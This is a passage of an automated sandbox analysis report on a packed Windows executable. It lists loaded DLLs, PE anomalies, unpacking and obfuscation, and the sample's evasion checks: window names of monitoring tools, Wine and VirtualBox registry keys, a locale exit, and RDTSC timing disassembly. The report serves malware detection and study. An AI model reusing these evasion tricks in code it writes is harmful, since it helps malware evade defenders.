Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1828864 > 1048576

Source: file.exe

Static PE information: Raw size of pypkqjdw is bigger than: 0x100000 < 0x198600

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.940000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pypkqjdw:EW;fqpfwnfj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pypkqjdw:EW;fqpfwnfj:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00959860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1caa0f should be: 0x1cca40

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: pypkqjdw
Source: file.exe	Static PE information: section name: fqpfwnfj
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB88C2 push 45D11B5Ch; mov dword ptr [esp], ebx	0_2_00CB88F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB88C2 push 1B3F5D88h; mov dword ptr [esp], edx	0_2_00CB89CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB88C2 push 17EE9B89h; mov dword ptr [esp], ecx	0_2_00CB89E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB88C2 push ebp; mov dword ptr [esp], edx	0_2_00CB8A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB88C2 push 7ACF34A2h; mov dword ptr [esp], ecx	0_2_00CB8A96
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB88C2 push eax; mov dword ptr [esp], ebp	0_2_00CB8AA2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DAC8C4 push 3D0B2B3Ch; mov dword ptr [esp], esp	0_2_00DAC93D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D860FD push 5CEB16B2h; mov dword ptr [esp], ebx	0_2_00D8613D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D860FD push 3919A446h; mov dword ptr [esp], eax	0_2_00D8617F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CAF8FE push ebp; mov dword ptr [esp], edi	0_2_00CAF9AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CAF8FE push ecx; mov dword ptr [esp], E60C94C7h	0_2_00CAF9E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD309C push edi; mov dword ptr [esp], ebp	0_2_00DD30D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD309C push ecx; mov dword ptr [esp], 5FF79B79h	0_2_00DD30E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2D885 push edi; mov dword ptr [esp], esi	0_2_00D2D8A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C38099 push edx; mov dword ptr [esp], 12A2CCC0h	0_2_00C380DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C38099 push 37E74602h; mov dword ptr [esp], eax	0_2_00C3813C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE0085 push ebp; mov dword ptr [esp], ecx	0_2_00DE00AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE0085 push 4785A463h; mov dword ptr [esp], ebp	0_2_00DE00C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D4485E push 5DD3F517h; mov dword ptr [esp], eax	0_2_00D448A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7B859 push ebp; mov dword ptr [esp], ebx	0_2_00D7B896
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6F059 push ebp; mov dword ptr [esp], esi	0_2_00D6F067
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0095B035 push ecx; ret	0_2_0095B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D71076 push ebx; mov dword ptr [esp], edx	0_2_00D71098
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD686F push 65287EA0h; mov dword ptr [esp], ebx	0_2_00CD689D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD686F push 5DEB55EAh; mov dword ptr [esp], edx	0_2_00CD69DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD686F push edx; mov dword ptr [esp], esi	0_2_00CD6A83
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD686F push ebx; mov dword ptr [esp], ebp	0_2_00CD6ADB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD686F push edx; mov dword ptr [esp], esp	0_2_00CD6ADF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD304D push ebp; mov dword ptr [esp], 67FEB9D0h	0_2_00FD30CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD304D push edi; mov dword ptr [esp], esi	0_2_00FD310B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD304D push 6A8AA740h; mov dword ptr [esp], ebx	0_2_00FD3148

Source: file.exe

Static PE information: section name: pypkqjdw entropy: 7.954735554227634

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00959860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFDEB7 second address: CFDEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007F0D344F4AB6h 0x0000000c popad 0x0000000d jmp 00007F0D344F4AC3h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFDEDD second address: CFDEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D14F67 second address: D14F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0D344F4AB6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D14F76 second address: D14FAF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D34B708F6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F0D34B708FAh 0x00000012 popad 0x00000013 pushad 0x00000014 jl 00007F0D34B708FEh 0x0000001a jp 00007F0D34B708F6h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F0D34B70901h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D15272 second address: D15278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17D81 second address: D17D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17D85 second address: D17D8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17D8B second address: D17DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D34B70901h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17DA0 second address: D17E5F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0D344F4AC8h 0x0000000e nop 0x0000000f jmp 00007F0D344F4ABCh 0x00000014 mov ecx, dword ptr [ebp+122D286Eh] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F0D344F4AB8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 mov edi, 29F5356Bh 0x0000003b push E3F758FAh 0x00000040 jmp 00007F0D344F4AC5h 0x00000045 add dword ptr [esp], 1C08A786h 0x0000004c push ecx 0x0000004d mov dword ptr [ebp+122D1CE6h], ecx 0x00000053 pop edi 0x00000054 push 00000003h 0x00000056 push edx 0x00000057 pushad 0x00000058 sub dword ptr [ebp+122D2178h], edi 0x0000005e sub dword ptr [ebp+122D17F6h], esi 0x00000064 popad 0x00000065 pop edi 0x00000066 push 00000000h 0x00000068 jmp 00007F0D344F4AC4h 0x0000006d push 00000003h 0x0000006f push 94DDD486h 0x00000074 push esi 0x00000075 push eax 0x00000076 push edx 0x00000077 js 00007F0D344F4AB6h 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17E5F second address: D17E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17E63 second address: D17ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 2B222B7Ah 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F0D344F4AB8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 jbe 00007F0D344F4AB7h 0x0000002e cld 0x0000002f lea ebx, dword ptr [ebp+12449CACh] 0x00000035 push esi 0x00000036 sub dword ptr [ebp+124454D6h], esi 0x0000003c pop esi 0x0000003d xchg eax, ebx 0x0000003e jmp 00007F0D344F4AC7h 0x00000043 push eax 0x00000044 pushad 0x00000045 push ebx 0x00000046 jmp 00007F0D344F4AC2h 0x0000004b pop ebx 0x0000004c push esi 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F37 second address: D17F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F3D second address: D17F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F0D344F4AB8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F51 second address: D17F6A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f ja 00007F0D34B70908h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F6A second address: D17F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F6E second address: D17F97 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F0D34B70904h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F97 second address: D17F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F9B second address: D17F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F9F second address: D18027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D3672h], ebx 0x0000000e or dword ptr [ebp+122D181Eh], ebx 0x00000014 push 00000003h 0x00000016 or edi, 58CB06EAh 0x0000001c push 00000000h 0x0000001e mov edx, dword ptr [ebp+122D3815h] 0x00000024 push 00000003h 0x00000026 mov di, dx 0x00000029 push C8BB27B5h 0x0000002e push eax 0x0000002f jl 00007F0D344F4ABCh 0x00000035 pop eax 0x00000036 xor dword ptr [esp], 08BB27B5h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F0D344F4AB8h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 mov dword ptr [ebp+12447C8Fh], esi 0x0000005d lea ebx, dword ptr [ebp+12449CB5h] 0x00000063 or dword ptr [ebp+122D1969h], ebx 0x00000069 push eax 0x0000006a pushad 0x0000006b push eax 0x0000006c jmp 00007F0D344F4ABFh 0x00000071 pop eax 0x00000072 push eax 0x00000073 push edx 0x00000074 push edx 0x00000075 pop edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18074 second address: D1809B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov esi, dword ptr [ebp+122D38C5h] 0x00000013 push 00000000h 0x00000015 sub dx, 66E7h 0x0000001a push CEBD4130h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1809B second address: D1809F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1809F second address: D180A9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D180A9 second address: D180DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 3142BF50h 0x00000010 mov di, 1AB7h 0x00000014 push 00000003h 0x00000016 sbb dx, 8165h 0x0000001b push 00000000h 0x0000001d push 00000003h 0x0000001f mov cl, bl 0x00000021 push 8ED3D7DFh 0x00000026 push eax 0x00000027 push edx 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D180DE second address: D180E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D180E3 second address: D1813E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 312C2821h 0x0000000f mov si, ax 0x00000012 lea ebx, dword ptr [ebp+12449CC0h] 0x00000018 xchg eax, ebx 0x00000019 jnp 00007F0D344F4ACAh 0x0000001f jmp 00007F0D344F4AC4h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F0D344F4AC2h 0x0000002d jmp 00007F0D344F4AC1h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1813E second address: D18144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37978 second address: D3797C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3797C second address: D37999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FFh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F0D34B708F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37999 second address: D379B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC0h 0x00000007 je 00007F0D344F4AB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37CD5 second address: D37CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37E44 second address: D37E50 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D344F4AB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37E50 second address: D37E55 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37FBC second address: D37FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37FC2 second address: D37FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a jnl 00007F0D34B708F8h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37FD7 second address: D37FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0D344F4AB6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38121 second address: D3812A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D384F8 second address: D38502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0D344F4AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38502 second address: D38538 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F0D34B708FCh 0x0000000c jng 00007F0D34B708F8h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d pop eax 0x0000001e push edi 0x0000001f pop edi 0x00000020 popad 0x00000021 pushad 0x00000022 jmp 00007F0D34B708FBh 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38538 second address: D38541 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38693 second address: D38699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E36C second address: D2E374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E374 second address: D2E380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0D34B708F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E380 second address: D2E394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F0D344F4AB8h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E394 second address: D2E398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E398 second address: D2E3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E3A4 second address: D2E3AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E3AA second address: D2E3B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E3B0 second address: D2E3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0B4D8 second address: D0B4E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0D344F4AB6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0B4E7 second address: D0B4F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38819 second address: D3882F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC1h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38E05 second address: D38E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38E09 second address: D38E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D390B0 second address: D390B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D390B6 second address: D390BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D390BA second address: D390D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D390D3 second address: D390F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0D344F4ABCh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jmp 00007F0D344F4ABAh 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
